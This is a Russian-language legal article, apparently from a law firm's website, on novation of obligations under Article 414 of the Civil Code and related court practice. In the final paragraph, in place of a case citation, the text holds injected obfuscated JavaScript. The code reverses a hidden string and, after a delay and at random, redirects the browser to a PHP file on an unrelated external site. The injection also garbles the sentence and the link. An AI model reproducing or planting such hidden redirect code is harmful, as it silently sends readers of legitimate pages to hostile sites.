Новация обязательств: основные трудности и судебная практика

Комментарий Алексея Станкевича, партнёра Orchards, для Право.ru.

Заменить одно обязательство на другое можно с помощью новации. Это удобно, ведь контрагенты могут превратить долг по поставке в заем. В таких случаях должнику не придется выплачивать неустойку, а кредитор сможет получить свои деньги даже после истечения срока давности. Но есть и минусы. И главный из них — не все долги можно новировать. При этом законодательно не до конца решено, какие из обязательств не трансформируются. Как избежать проблем при использовании новации — обсудили с юристами.

Новацию, то есть замену первоначального требования на другое, разрешает ст. 414 ГК. Воспользоваться механизмом могут как компании, так и физические лица. Главное, чтобы новое условие отличалось от предыдущего, а не просто его корректировало. Так, долг по договору купли-продажи или неосновательное обогащение можно, например, превратить в заем (п. 24 Постановления Пленума ВС от 11.06.2020 № 6). А вот соглашение о рассрочке долга новацией не будет. Если заключен договор новации, то первоначальное обязательство полностью прекращается (не начисляется неустойка, не течет срок исковой давности, прекращаются поручительства и залог) и возникает новое. Это значит, что контрагент уже не может предъявлять иск по первоначальному соглашению.

<…>

В судебной практике доминирует принцип «Новация не предполагается», говорит эксперт. В п. 2 обзора практики применения арбитражными судами ст. 414 ГК Президиум ВАС приводит пример такого дела. Компания не выплатила долг за теплоснабжение, поэтому муниципальное предприятие обратилось в суд. Первая инстанция отказалась взыскивать долг, посчитав, что стороны заключили договор новации обязательств. Потому что в переписке они обсуждали, что должник передаст истцу молочную продукцию. Но апелляционная инстанция отменила это решение и удовлетворила иск. Суд указал: «Если стороны намерены совершить новацию, то они должны это определенно выразить», но в этом деле истец и ответчик не сделали этого. А в таком случае новация не происходит.

Партнер Orchards Алексей Станкевич уточняет: если в соглашении не сказано, является оно новацией или отступным (ст. 409 ГК), то оно будет истолковано в качестве последнего. Из этого принципа исходят суды (дело $NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tory/244730/»>Ссылка на статью>>

Подпишитесь на Telegram Orchards

X